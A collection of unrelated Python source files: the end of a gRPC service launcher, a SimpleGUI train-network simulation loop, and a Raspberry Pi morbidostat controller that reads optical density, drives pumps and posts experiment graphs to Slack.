channel = grpc.insecure_channel(framework_url)
service = ControllableService(
itf_rpc.MonitorStub(channel),
factory.ControllableProcessFactory(channel),
d)
if recovery:
service.restore_state(session_id)
try:
_SERVER.start(
service,
controllable_url)
except Exception as e:
# todo: write to log?, send report to controller?
raise RuntimeError('Unexpected error', e)
if __name__ == '__main__':
cli()
|
GameLoop.py
|
print("""\
mmm mmmm mmm mmmm mmmm mmmm
m" " #" " # # # " "# m" "m
# "#mmm # "mmmm" mmm" # m #
# "# # # "# "# # #
"mmm" "mmm#" mm#mm "#mmm" "mmm#" #mm#
""")
import sys, configparser
import time
from SimpleGUICS2Pygame import simplegui_lib_fps
from SimpleGUICS2Pygame import simpleguics2pygame
#LOADING SETTINGS
config = configparser.ConfigParser()
#Open file as writeable
config.read_file(open('Classes/config'))
#Override settings when testing (to make it easier to run multiple instances)
if(len(sys.argv) > 1):
print("OVERIDING SETTINGS_________________________")
config['NETWORKING']['CONFIG_TYPE'] = sys.argv[1]
config.set('NETWORKING', 'CONFIG_TYPE', sys.argv[1])
with open('Classes/config', "w") as conf:
config.write(conf)
#reopen
#config.read_file(open('Classes/config'))
# #LOAD INTERNAL CLASSES
# from Transfer.comms import communicate, recieve, ping
from Handlers.KeyHandler import keydown, keyup
from Handlers.ClickHandler import checkClick
from Loading.Objects import send_list
from Loading.Objects import *
from Loading.Objects import simTime
from GameStates.intro import introLoop, waitingLoop,storyLoop
from threading import Thread
#-----START----GAME----CLOCK
fps = simplegui_lib_fps.FPS()
fps.start()
#initiate Ai
# print("HERE")
# updateP=Thread(target=updatePeople)
# print("then here")
# updateP.start()
print("NOW Here ")
print("MONSTERS LOADED AND SPAWNED")
cwd=os.getcwd()
#--------------GAME-----LOOP-------------------
startTime=time.time()
currentTime=time.time()
def draw(canvas):
#========== GAME LOOPS NON MAIN =====================
# x,y=train.nextNode['lon'],train.nextNode['lat']
# pos=Vector(x,y).transformToCam(cam)
# canvas.draw_circle((pos.getX(),pos.getY()), 20, 2, 'Yellow')
if gameState1.main and gameState2.main:
# line.drawByName(canvas, cam, line_dict, way_dict, node_dict, 'Waterloo & City: Waterloo → Bank',
# 'blue')
autoCam.update(cam,train_dict)
# mapLoader.update((baseNode['lat'], baseNode['lon']), cam, spriteDictionary)
# mapLoader.draw(canvas, cam)
trainLoader.load(train_dict,spriteDictionary,relation_dict,line_dict,way_dict,node_dict,nodeTraffic_dict,variables['simulation_speed'])
global simTime,currentTime
simTime += (time.time() - currentTime) * variables['simulation_speed']
currentTime=time.time()
timeString="("+str(round(((simTime/60)/60)))+" : "+str(round((simTime/60)%60))+" : "+str(round(simTime%60,1))+")"
timeLable.set_text(timeString)
for trainId in train_dict:
train=train_dict[trainId]
train.update(nodeTraffic_dict,relation_dict,line_dict,way_dict,node_dict,variables['simulation_speed'])
# line.drawNodeList(canvas,cam,node_dict,all_stops)
# train.draw(canvas,cam,node_dict)
if train.send:
train.send=False
stopId=train.currentStop
stop=all_stops_dict[stopId]
stop['train']=train.encode()
stop['time']=simTime
send_list.append(stop)
# if train.remove:
# train.remove=False
# stopId = train.currentStop
# stop = all_stops_dict[stopId]
# stop['train'] = {}
# send_list.append(stop)
if len(send_list)>0:
with open(cwd + '/Loading/TrainLog', 'a+') as outfile:
for stop in send_list:
json.dump(stop,outfile)
outfile.write("\n")
send_list.clear()
numTrains.set_text('Number of Trains: '+str(len(train_dict)))
#======================== ===========================================
#================ CLICK HANDLER =================================
checkClick()
#================ CLICK HANDLER END =================================
#===================================================================
#================ DRAW AND UPDATES =================================
# -------UPDATE-AND-DRAW---OBJECTS---BY---LAYER---PRIORITY
# x,y=train.nextNode['lon'],train.nextNode['lat']
# pos=Vector(x,y).transformToCam(cam)
# canvas.draw_circle((pos.getX(),pos.getY()), 20, 2, 'Yellow')
# --------------- CONSTRUCT AND DRAW LINES FROM THE WAYS -------
# ========================================================================================
# ======================== CAMERA UPDATE ===============================================================
cam.move()
cam.zoom()
fps.draw_fct(canvas)
# ========================== CAMERA UPDATE END==============================================================
# ========================================================================================
# ========================== STATS DISPLAY ==============================================================
#DISPLAY STATS:
# life.set_text('CamX: ' + str(train.particle.pos))
##
## Init
##
frame = simpleguics2pygame.create_frame('Game', int(config['CANVAS']['CANVAS_WIDTH']), int(config['CANVAS']['CANVAS_HEIGHT']))
frame.set_canvas_background('Black')
#Labels
numTrains = frame.add_label('Number of Trains: '+str(len(train_dict)))
timeLable = frame.add_label('Time: ')
rng = frame.add_label('Ranfe: ')
arrows = frame.add_label('Arrows: ')
spells = frame.add_label('Spells: ')
remote = frame.add_label('Remote Addr: ' + config['NETWORKING']['client_ip'])
frame.set_draw_handler(draw)
frame.set_keydown_handler(keydown)
frame.set_keyup_handler(keyup)
frame.start()
|
master_slackv2.py
|
#!/usr/bin/python3
import time
import sys
from datetime import datetime
import csv
import threading
from multiprocessing import Process
import configparser
import fileinput
import RPi.GPIO as GPIO
import numpy as np
import os
import board
import busio
import adafruit_ads1x15.ads1015 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
from adafruit_mcp230xx.mcp23017 import MCP23017
import digitalio
import pandas as pd
import matplotlib.pyplot as plt
# Needed for Slack Integration
import slack
#Logging
import logging
import plotter
import glob
mstart_time = datetime.now()
config = configparser.ConfigParser()
config.read('eve-conf.ini')
mchan = config['MAIN']['slack_channel']
totsys = (''.join(config.sections())).count('EVE')
actsys = []
for sysiter in range(totsys):
if config['EVE' + str(sysiter+1)].getboolean('enabled'):
actsys.append(sysiter+1)
slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
if slack_client.rtm_connect():
print ('Multiplexer Started.')
if (totsys == 1):
multimess = slack_client.chat_postMessage(
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There is ' + str(totsys) + ' system configured.')
)
else:
multimess = slack_client.chat_postMessage(
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There are ' + str(totsys) + ' systems configured.')
)
else:
sys.exit("No connection to Slack.")
chanid = multimess['channel']
multits = multimess['ts']
i2c_lock = [0]*totsys
i2c_q = []
graph_lock = [0]*totsys
graph_q = []
morbidostats = list()
if config['MAIN'].getboolean('temp_sensor'): temp = 0.0
def IC_init():
adc = list()
gpioe = list()
adc_add = list()
gpio_add = list()
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'EVE' + str(sysnum)
if config[confsec].getboolean('enabled'):
adc_add.append(config[confsec].getint('a_address'))
if not config[confsec].getboolean('Pi_pins'):
gpio_add.append(config[confsec].getint('m_address'))
adc_add = list(set(adc_add))
gpio_add = list(set(gpio_add))
i2c = busio.I2C(board.SCL, board.SDA)
if adc_add:
for add in adc_add:
adc.append(ADS.ADS1015(i2c, address= add))
if gpio_add:
for add in gpio_add:
gpioe.append(MCP23017(i2c, address=add))
return {'adc':adc, 'gpioe':gpioe, 'adc_add':adc_add, 'gpio_add':gpio_add}
def eve_starter():
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'EVE' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
print (confsec + ' enabled.')
morbidostats.append([Morbidostat(sysnum, len(actsys), chips), sysnum])
#Morbidostat(sysnum)
# thread.join
else:
print (confsec + ' not enabled. Skipping.')
slack_client.chat_postMessage(
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=mchan,
text = confsec + ' is not enabled. Skipping.'
)
print ('Starting EVEs')
for starti in range(len(morbidostats)):
morbidostats[starti][0].start()
def i2c_controller():
while True:
if len(i2c_q) is 0:
time.sleep(0.05)
else:
if i2c_q[0][1] is 'O':
morbidostats[int(i2c_q[0][0])][0].get_OD()
elif i2c_q[0][1] is 'C':
morbidostats[int(i2c_q[0][0])][0].control_alg()
elif i2c_q[0][1] is 'T':
temp_sensor_func()
i2c_q.pop(0)
def live_plotter():
max_time = 0
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'EVE' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
temp_time = config[confsec].getfloat('time_between_saves')
if temp_time > max_time:
max_time = temp_time
time.sleep(max_time*60+5)
odcsvs = []
pumpcsvs = []
for starti in range(len(morbidostats)):
temp_locs = morbidostats[starti][0].file_locs()
odcsvs.append(temp_locs['ods'])
pumpcsvs.append(temp_locs['pumps'])
plotter.Plotter(actsys, odcsvs, pumpcsvs, config['MAIN']['hostname'])
def slackresponder():
while True:
try:
events = slack_client.rtm_read()
for event in events:
for sysitr in range(len(morbidostats)):
sysnum = morbidostats[sysitr][1]
evename = 'EVE' + str(sysnum)
if (
event.get('channel') == chanid and
event.get('text') == evename and
event.get('thread_ts') == multits and
event.get('type') == 'message'
):
# print(event)
slack_client.chat_postMessage(
username = 'Multiplexer',
icon_url = config['MAIN']['multi_icon'],
channel=mchan,
text = 'Generating Graphs for ' + evename,
thread_ts= multits
)
morbidostats[sysitr][0].graphOD()
time.sleep(60)
except KeyboardInterrupt:
break
except Exception as e:
# slack_client.api_call(
# "chat.postMessage",
# username = 'Multiplexer',
# icon_url = config['MAIN']['multi_icon'],
# channel=mchan,
# text = 'Slack Reponder *o*',
# thread_ts= multits
# )
# slack_client.api_call(
# "chat.postMessage",
# username = 'Multiplexer',
# icon_url = config['MAIN']['multi_icon'],
# channel=mchan,
# text = e,
# thread_ts= multits
# )
pass
def temp_runner():
if config['MAIN'].getboolean('temp_sensor'):
while True:
i2c_q.append('TT')
time.sleep(3)
def temp_sensor_func():
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
f = open(device_file, 'r')
lines = f.readlines()
f.close()
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
lines = read_temp_raw()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
global temp
temp = float(temp_string) / 1000.0
class Morbidostat:
def __init__(self, sysnum, actsys, chips):
self.printing = False
self.sysnum = sysnum
self.actsys = actsys
self.adc= chips['adc']
self.gpioe = chips['gpioe']
self.adc_add = chips['adc_add']
self.gpio_add = chips['gpio_add']
self.sysstr = 'EVE' + str(self.sysnum)
self.threads = {}
self.thread_locks = {'save' : threading.Lock(), 'adc' : threading.Lock(), 'dynL' : threading.Lock(), 'control_alg' : threading.Lock(), 'graphs' : threading.Lock(), 'threads' : threading.Lock()}
self.config = configparser.ConfigParser()
self.config.read('eve-conf.ini')
# Define Experiment Variables
self.time_between_pumps = self.config[self.sysstr].getfloat('time_between_pumps')
self.OD_thr = self.config[self.sysstr].getfloat('OD_thr')
self.OD_thr_set = False
self.OD_min = self.config[self.sysstr].getfloat('OD_min')
self.OD_err = self.config[self.sysstr].getfloat('OD_error')
self.time_between_ODs = self.config[self.sysstr].getfloat('time_between_ODs') # how often to gather OD data, in seconds
self.time_between_graphs = self.config[self.sysstr].getfloat('time_between_graphs') # how often to graph, in minutes
# OD_thr is the threshold above which to activate drug pump [vish bench tests: empty: 3.5V, Clear Vial: 0.265V, Very Cloudy Vial: 2.15V]
#time_between_writes = 1 # how often to write out OD data, in minutes
#loops_between_writes = (time_between_writes*60)/time_between_ODs # time bewteen writes in loops
self.time_between_saves = self.config[self.sysstr].getfloat('time_between_saves')
# Set Up I2C to Read OD Data
# Create the I2C bus
self.P_drug_times = self.config[self.sysstr].getfloat('P_drug_times')
self.P_nut_times = self.config[self.sysstr].getfloat('P_nut_times')
self.P_waste_times = self.config[self.sysstr].getfloat('P_waste_times')
self.running_data = [] # the list which will hold our 2-tuples of time and OD
self.pump_data = []
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.root_dir = self.config['MAIN']['save_location']
# self.currOD = np.zeros(num_cham)
self.currOD = 0
# averaged OD value
self.scaling = self.config[self.sysstr].getboolean('scaling')
self.avOD = 0
self.maxOD = 0
self.OD_av_length = self.config[self.sysstr].getint('OD_av_length')
# OD averaging buffer
self.avOD_buffer = [0] * self.OD_av_length #need to change for multiplexing
self.thresh_check = self.config[self.sysstr].getfloat('time_thresh')
self.growthOD = []
self.growthrate = []
self.growthrate2 = []
self.growthrate_t = []
self.avefac = 30
self.instant_gr = 0
self.instant_gr2 = 0
self.graph_loops = self.actsys * self.config['MAIN'].getint('graph_resolution_fac')
self.elapsed_loop_time = 0
self.loops = 0
self.last_dilutionOD = 0
self.nut = 0
self.drug = 1
self.waste = 2
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.drug_mass = 0
self.temp_sensor = self.config['MAIN'].getboolean('temp_sensor')
self.total_time = self.config[self.sysstr].getfloat('Exp_time_hours')*3600 #in seconds
self.loops_between_ODs = 1
self.loops_between_pumps = (self.time_between_pumps*60)/self.time_between_ODs # time between pumps in loops
# num_cham = 1 # number of morbidostat vials being used
self.photod = AnalogIn(self.adc[self.adc_add.index(self.config[self.sysstr].getint('a_address'))], getattr(ADS,'P'+ str(self.config[self.sysstr].getint('Analogin'))))
# Setup the GPIO Pins to Control the Pumps
self.pipins = self.config[self.sysstr].getboolean('pi_pins')
self.P_drug_pins = self.config[self.sysstr].getint('P_drug_pins')
self.P_nut_pins = self.config[self.sysstr].getint('P_nut_pins')
self.P_waste_pins = self.config[self.sysstr].getint('P_waste_pins')
self.P_LED_pins = self.config[self.sysstr].getint('P_LED_pins')
# P_fan_pins = self.config[self.sysstr].getint('P_fan_pins')
self.pin_list = [self.P_drug_pins, self.P_nut_pins, self.P_waste_pins, self.P_LED_pins]
if self.pipins:
GPIO.setmode(GPIO.BCM)
for pin in self.pin_list:
GPIO.setup(pin, GPIO.OUT)
else:
self.pins = [None]*(max(self.pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
for pin in self.pin_list:
self.pins[pin] = self.mcp.get_pin(pin)
self.pins[pin].direction = digitalio.Direction.OUTPUT
self.pins[pin].value = False
self.init_time = datetime.now()
# self.slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
# self.slack_client = slack_client
self.slack_usericon = self.config[self.sysstr]['slack_icon']
self.chan = self.config['MAIN']['slack_channel']
global slack_client
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.init_time.strftime('Initialized at %H:%M:%S')
)
def start(self):
self.start_time = datetime.now()
if self.root_dir[-1] == '/': self.root_dir.pop(-1)
os.makedirs(self.root_dir + "/" + self.sysstr + "/" + str(self.start_time))
# self.elogr = logging.getLogger('self.elogr')
# self.elogr.setLevel(logging.DEBUG)
# self.elogrfh = logging.FileHandler('%s/%s/%s/exceptions.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.elogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.elogr.addHandler(self.elogrfh)
# self.ilogr = logging.getLogger('self.ilogr')
# self.ilogr.setLevel(logging.INFO)
# self.ilogrfh = logging.FileHandler('%s/%s/%s/info.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.ilogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.ilogr.addHandler(self.ilogrfh)
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.outfile_pump = "%s/%s/%s/pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','drug_mass'])
file.close()
#Detailed Files
self.hr_outfile_OD = "%s/%s/%s/hr_ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.hr_outfile_pump = "%s/%s/%s/hr_pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','drug_mass'])
file.close()
#TURN ON THE FAN HERE
# print('Experiment begun at %02s:%02s:%02s' % (self.start_time.hour, self.start_time.minute, self.start_time.second))
print(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
# self.ilogr.info(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
threading.Thread(target=self.on_timer).start()
global slack_client
self.initalmessage = slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Experiment started at %H:%M:%S on %a - %b %d, %Y')
)
self.recgra = slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Most recent graphs')
)
# self.history = self.slack_client.api_call("channels.history", channel=self.chanid, count = 1)
# self.threadts = self.history['messages'][0]['ts']
self.chanid = self.initalmessage['channel']
self.threadts = self.initalmessage['ts']
self.recgrats = self.recgra['ts']
self.firstrec = True
def get_OD(self):
# global i2c_lock
print_buffer = 0
# i2c_q.append(id)
# while i2c_q[0] is not id and not sum(i2c_lock):
# time.sleep(0.1)
# print_buffer += 1
# if print_buffer % 15 == 0:
# print ('[%s] {GetOD} Waiting for Locks...' % self.sysstr)
# print(i2c_q)
# if i2c_q[0] is id:
# i2c_lock[self.sysnum-1] = True
# time.sleep(0.05)
try:
if self.pipins:
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.P_LED_pins, GPIO.OUT)
GPIO.output(self.P_LED_pins,1)
time.sleep(0.1)
self.currOD = self.photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
GPIO.output(self.P_LED_pins,0)
else:
self.pins = [None]*(max(self.pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
self.pins[self.P_LED_pins] = self.mcp.get_pin(self.P_LED_pins)
self.pins[self.P_LED_pins].direction = digitalio.Direction.OUTPUT
self.pins[self.P_LED_pins].value = True
time.sleep(0.1)
self.currOD = self.photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
self.pins[self.P_LED_pins].value = False
except:
print ('[%s] OD - WARNING ADC REQUEST CRASHED' % self.sysstr)
pass
# i2c_lock[self.sysnum-1] = False
# i2c_q.pop(0)
self.avOD_buffer = self.avOD_buffer + [self.currOD]
self.avOD_buffer.pop(0)
self.avOD = sum(self.avOD_buffer)/len(self.avOD_buffer)
if self.avOD > self.maxOD: self.maxOD = self.avOD
self.thread_locks['adc'].release()
def pump_on(self,pump):
if self.pipins:
GPIO.output(pump, 1)
else:
self.pins[pump].value = True
print('[%s] Turning on pump %s' % (self.sysstr,pump))
def pump_off(self,pump):
if self.pipins:
GPIO.output(pump, 0)
else:
self.pins[pump].value = False
print('[%s] Turning off pump %s' % (self.sysstr,pump))
def all_pump_off(self):
if self.pipins:
for i in pin_list:
GPIO.output(i, 0)
else:
for i in pin_list:
self.pins[i].value = False
print('[%s] Turning off all pump' % (self.sysstr,pump))
def file_locs(self):
return {'ods':self.outfile_OD, 'pumps': self.outfile_pump}
def bufferdata(self):
if self.temp_sensor:
global temp
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, temp, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
else:
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
pulist = [self.nut,self.drug,self.waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.drug_mass]
self.hr_pump_tmplist.append(pulist)
if self.max_nut < self.nut: self.max_nut = self.nut
if self.max_drug < self.drug: self.max_drug = self.drug
if self.max_waste < self.waste: self.max_waste = self.waste
self.nut = 0
self.drug = 1
self.waste = 2
if (self.loops % self.graph_loops) == 0:
pulist = [self.max_nut,self.max_drug,self.max_waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.drug_mass]
self.OD_tmplist.append(odlist)
self.pump_tmplist.append(pulist)
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
def savefunc(self):
self.thread_locks['save'].acquire()
self.bufferdata()
with open(self.hr_outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_OD_tmplist)
file.close()
with open(self.hr_outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_pump_tmplist)
file.close()
with open(self.outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.OD_tmplist)
file.close()
with open(self.outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.pump_tmplist)
file.close()
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.thread_locks['save'].release()
def graphOD(self):
self.thread_locks['graphs'].acquire()
global graph_lock
global graph_q
id = str(self.sysnum)+'G'
graph_q.append(id)
time.sleep(0.1)
while graph_q[0] is not id:
time.sleep(30)
if graph_q[0] is id:
graph_lock[self.sysnum-1] = True
time.sleep(2)
print('[%s] Generating graph' % self.sysstr)
try:
global slack_client
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = 'Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD),
thread_ts = self.threadts
)
allODs = pd.read_csv(self.outfile_OD, index_col='hour')
if self.scaling: allODs[['average']] = allODs[['average']]/float(allODs[['maxod']].iloc[-1])
if self.scaling: allODs[['min']] = allODs[['min']]/float(allODs[['maxod']].iloc[-1])
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot() #figsize=(10,10) in the plot
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
ODfig.savefig("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODplt = None; ODfig = None; fig = None
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "ODPlot",
file = file_content
)
allpumps = pd.read_csv(self.outfile_pump, index_col='hour') # cols: 'media', 'drug','waste','pump_time','hour','drug_mass'
allconcs = allpumps[['drug_mass']]/12
allconcs.rename(columns={'drug_mass':'drug_conc'}, inplace=True)
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODplt.set_ylabel(ylabel='Average OD')
lines, labels = ODplt.get_legend_handles_labels()
DM = ODplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allconcs.plot(ax = DM, label='drug_mass',color='tab:orange',legend=False)
DM.set_ylabel(ylabel='Drug Concentration (ug/mL)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODplt.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODplt.figure = None; ODplt = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "ODConc",
file = file_content
)
pumpa = allpumps[['media','drug','waste']]
PUplt,PUax = plt.subplots()
PUax.plot(allODs[['average']], label= 'average', color='tab:blue')
PUax.plot(allODs[['min']], label= '_nolegend_', color = 'tab:grey', linestyle= ':')
PUax.set_ylabel(ylabel='Average OD')
lines, labels = PUax.get_legend_handles_labels()
DM = PUax.twinx()
DM.spines['right'].set_position(('axes', 1.0))
pumpa.plot(ax = DM,color=['tab:orange','tab:red','tab:green'],legend=False)
DM.set_yticklabels([])
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
PUax.legend(lines, labels, loc=2)
# PUplt.axhline(y=self.OD_min, color='tab:grey', linestyle=':')
# PUplt.axhline(y=self.OD_thr, color='tab:grey', linestyle=':')
# PUfig = PUplt.get_figure()
PUplt.savefig("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
allpumps = None; PUplt.figure = None; PUplt = None; allconcs= None; colors = None; DM = None; pumpa = None
plt.close('all')
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "PUPlot",
file = file_content
)
# THREADS GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['threads']].plot(ax = DM, label='threads',color='tab:purple',legend=False)
DM.set_ylabel(ylabel='Active Threads')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "ODThreads",
file = file_content
)
# TEMP GRAPH
if self.temp_sensor:
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['temp']].plot(ax = DM, label='threads',color='tab:pink',legend=False)
DM.set_ylabel(ylabel='Incubator Temperature (C)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); allODs = None; ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "ODTemp",
file = file_content
)
if self.firstrec:
self.recmes = slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = 'Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("/%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
